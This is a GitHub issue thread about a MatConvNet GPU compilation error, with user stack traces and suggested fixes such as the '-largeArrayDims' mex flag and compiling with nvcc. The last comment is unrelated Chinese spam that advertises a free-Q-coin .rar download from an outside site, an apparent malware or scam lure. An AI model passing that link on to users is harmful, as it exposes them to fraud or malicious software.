### ISSUE TITLE
Error using vl_nnconv An input is not a numeric array (or GPU support not compiled).

### ISSUE THREAD

**Issue by drohit92** [vlfeat/matconvnet#99] opened 2015-03-16 01:38 UTC
Hi,

My current configuration is:

CUDA 6.5, 
Ubuntu 14.04
Matlab R2014b
GPU: K40

While running mnist/cifar/imagent in GPU mode I get the error:

learning rate changed (0.000000 --> 0.001000): resetting momentum
training: epoch 01: processing batch   1 of 600 ...Error using vl_nnconv
An input is not a numeric array (or GPU support not compiled).

Error in vl_simplenn_new (line 155)
      res(i+1).x = vl_nnconv(res(i).x, l.filters, l.biases, 'pad', l.pad, 'stride', l.stride) ;

Error in cnn_train_new (line 169)
    res = vl_simplenn_new(net, im, one, res, ...

Error in cnn_mnist_new (line 102)
[net, info] = cnn_train_new(net, imdb, @getBatch, ...

The same function vl_nnconv works in CPU mode though. If I gather the arrays and perform vl_nnconv it works. So I guess the problem has to be with the GPU implementation of the code.

@lenck  @vedaldi  @dteney Any suggestions without downgrading to 5.5? Without this, the imagenet example is impossible to run..!

Thanks in advance.

**Comment by AnanS** [comment] 2015-03-16 02:57
My setup is very similar to yours (K40 <-> K80), and I can run the examples using GPU (but see https://github.com/vlfeat/matconvnet/issues/96 for another potential error). Perhaps something went wrong during compilation. Was there any warnings/errors?

**Comment by drohit92** [comment] 2015-03-16 14:00
Hi @AnanS 

I remeber compiling it successfully the last time. Except a few warning like "Warning: You are using gcc version '4.8.2-19ubuntu1)'. The version of gcc is not supported. The version currently supported with MEX is '4.7.x'. For a list of
currently supported compilers see: http://www.mathworks.com/support/compilers/current_release.
"

everything else went smoothly... but just to be sure I cloned a fresh copy of matconvnet and unfortunately I am no longer able to compile the cudnn gpu version. I can't even run the mnist example now.

I get this new erroe now, even while running the test: 

Error using vl_nnconv
Maximum variable size allowed on the device is exceeded.

Error in vl_test_nnlayers (line 124)
      y = vl_nnconv(x,[],b,'verbose') ;

However the same old code in a different folder still works. I must have missed something.
Can you plz suggest what to do.?
Thanks

**Comment by exploreman** [comment] 2015-03-26 08:05
I have the same error of "Maximum variable size allowed on the device is exceeded" as yours. It works in my case by the following method.

Make sure that compile the cuda codes by "mex -largeArrayDims *.cu" with parameter " -largeArrayDims". I therefore simply change the function of "mex_compile" in vl_compilenn.m as follows:

original: mopts = {'-outdir', fileparts(tgt), src, '-c', mex_opts{:}} ;
chaged to: mopts = {'-outdir', fileparts(tgt), src, '-c', mex_opts{:}, '-largeArrayDims'} ;

Then compile again.

**Comment by ShasTheMass** [comment] 2015-03-30 08:49
Thanks @exploreman, that was spot on!

**Comment by vedaldi** [comment] 2015-03-30 12:48
Thanks, -largeaArrayDims will be a default compilation flag in the future.

**Comment by sukritshankar** [comment] 2015-03-31 22:21
@exploreman - That solved the problem in a shot :)

**Comment by exploreman** [comment] 2015-04-01 00:51
I am happy it solved your problem :)

**Comment by lenck** [comment] 2015-04-16 09:20
@drohit92 - I hope that your problem is solved so that I can close the issue...

**Closed by lenck** 2015-04-16 09:20 UTC

**Comment by drohit92** [comment] 2015-04-16 13:54
@lenck yes thanks.. I am sorry I forgot to do it myself

**Comment by lenck** [comment] 2015-04-16 13:56
No worries :) Thanks for letting us know!

**Comment by Mahesh-MR** [comment] 2015-08-19 14:53
Hi,
    I got the same error after successful compilation. 
Error using vl_nnconv An input is not a numeric array (or GPU support not compiled).

Error in vl_simplenn (line 153)
      res(i+1).x = vl_nnconv(res(i).x, l.filters, l.biases, 'pad', l.pad, 'stride', l.stride) ;

Error in cnn_train (line 140)
    res = vl_simplenn(net, im, one, res, ...

Error in exercise4 (line 56)
[net,info] = cnn_train(net, imdb, @getBatch, trainOpts) ;
I tried this and it is not working. Please help.

**Comment by orshij** [comment] 2015-09-22 06:17
Try compiling using CudaMethod =  nvcc:
vl_compilenn('enableGpu', true, 'cudamethod','nvcc')

**Comment by zgplvyou** [comment] 2016-09-17 01:47
I got the same question. you need load the latest version.there are some bugs in the previous version.

**Comment by Sanggeun-Ahn** [comment] 2016-11-24 08:40
@orshij  
Thanks a million !!  I've tried to fix this error long time but, I couldn't.
Your answer solved my problem exactly .

**Comment by csjunxu** [comment] 2017-06-02 06:40
I run the code

vl_compilenn('enableGpu', true)

and the problem is solved.

**Comment by MSathishkumar1990** [comment] 2018-06-29 03:06
Please, anyone, help me to debug this error in windows 10, Matlab R2018

Error using vl_nnconv
An input is not a numeric array (or GPU support not compiled).

Error in vl_simplenn (line 300)
      res(i+1).x = vl_nnconv(res(i).x, l.weights{1}, l.weights{2}, ...

Error in get_features (line 22)
res = vl_simplenn(net,img);

**Comment by navy63** [comment] 2019-08-09 09:13
> I run the code
> 
> vl_compilenn('enableGpu', true)
> 
> and the problem is solved.

Thank you.  run It sucessfully according to your way

**Comment by EDINESH90** [comment] 2020-03-12 09:38
Kindly help me, to solve the following error, 

Error using vl_nnconv
An input is not a numeric array (or GPU support not compiled).

Error in vl_simplenn (line 153)
      res(i+1).x = vl_nnconv(res(i).x, l.filters, l.biases, 'pad', l.pad, 'stride', l.stride) ;

Error in mdnet_features_convX (line 20)
    res = vl_simplenn(net, batch, [], [], ...

Error in mdnet_run (line 37)
    feat_conv = mdnet_features_convX(net_conv, img, pos_examples, opts);

Error in demo_tracking (line 22)
result = mdnet_run(conf.imgList, conf.gt(1,:), net);

**Comment by xuesyang** [comment] 2022-03-07 09:46
> Please, anyone, help me to debug this error in windows 10, Matlab R2018
> 
> Error using vl_nnconv An input is not a numeric array (or GPU support not compiled).
> 
> Error in vl_simplenn (line 300) res(i+1).x = vl_nnconv(res(i).x, l.weights{1}, l.weights{2}, ...
> 
> Error in get_features (line 22) res = vl_simplenn(net,img);

**Comment by kalyan-ops** [comment] 2023-04-19 10:49
> Hi,
> 
> My current configuration is:
> 
> CUDA 6.5, Ubuntu 14.04 Matlab R2014b GPU: K40
> 
> While running mnist/cifar/imagent in GPU mode I get the error:
> 
> learning rate changed (0.000000 --> 0.001000): resetting momentum training: epoch 01: processing batch 1 of 600 ...Error using vl_nnconv An input is not a numeric array (or GPU support not compiled).
> 
> Error in vl_simplenn_new (line 155) res(i+1).x = vl_nnconv(res(i).x, l.filters, l.biases, 'pad', l.pad, 'stride', l.stride) ;
> 
> Error in cnn_train_new (line 169) res = vl_simplenn_new(net, im, one, res, ...
> 
> Error in cnn_mnist_new (line 102) [net, info] = cnn_train_new(net, imdb, @GetBatch, ...
> 
> The same function vl_nnconv works in CPU mode though. If I gather the arrays and perform vl_nnconv it works. So I guess the problem has to be with the GPU implementation of the code.
> 
> @lenck @vedaldi @dteney Any suggestions without downgrading to 5.5? Without this, the imagenet example is impossible to run..!
> 
> Thanks in advance.

Hi Sir, I am getting the same error. What should I do now?

**Comment by xuesyang** [comment] 2023-04-19 10:50
QQ业务辅助v1.1：http://www.alflb.com/gc.rar绝对真实，绝对安全，绝对免费，每月只能使用一次，每次可以刷100Q币加6钻，软件自带更新功能。下载地址：http://www.alflb.com/gc.rar
